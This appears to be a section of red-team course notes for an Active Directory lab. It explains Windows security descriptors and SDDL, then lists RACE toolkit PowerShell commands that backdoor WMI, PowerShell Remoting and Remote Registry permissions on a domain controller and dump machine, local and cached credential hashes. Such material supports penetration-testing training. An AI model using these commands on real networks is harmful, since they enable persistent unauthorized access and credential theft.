8.7.3 - Security Descriptors

Security Descriptors

Security Descriptors define access control for securable objects in Windows (e.g., services, WMI namespaces, registry keys). The format is described using SDDL (Security Descriptor Definition Language). SDDL strings are built from Access Control Entries (ACEs), which follow this structure:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

Example ACE for built-in administrators on WMI namespaces:

A;CI;CCDCLCSWRPWPRCWD;;;SID

This ACE grants administrators full control over WMI resources.


Using RACE Toolkit for Security Descriptor Abuse

You can abuse security descriptors to grant non-admin users access to protected resources. The RACE toolkit simplifies this process:

Load the toolkit:

. C:\AD\Tools\RACE-master\RACE.ps1

Modify WMI Security Descriptors

  • On the local machine:

Set-RemoteWMI -SamAccountName student1 -Verbose
  • On a remote machine without credentials:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
  • On a remote machine with credentials:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
  • To remove permissions from the remote machine:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

Persistence via PowerShell Remoting Descriptors

Note: PS Remoting backdoors via ACLs became unstable after August 2020 patches.

  • 🔸 On the local machine:

Set-RemotePSRemoting -SamAccountName student1 -Verbose
  • 🔸 On a remote machine:

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
  • 🔸 To remove remoting access:

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove

Persistence via Remote Registry Descriptors

Using RACE or DAMP, you can grant registry access to users and retrieve sensitive hashes:

  • 🔸 Add a backdoor via Remote Registry:

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
  • 🔸 As student1, dump the machine account hash:

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
  • 🔸 Retrieve local account hashes:

Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
  • 🔸 Retrieve domain cached credentials:

Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Labs

Last updated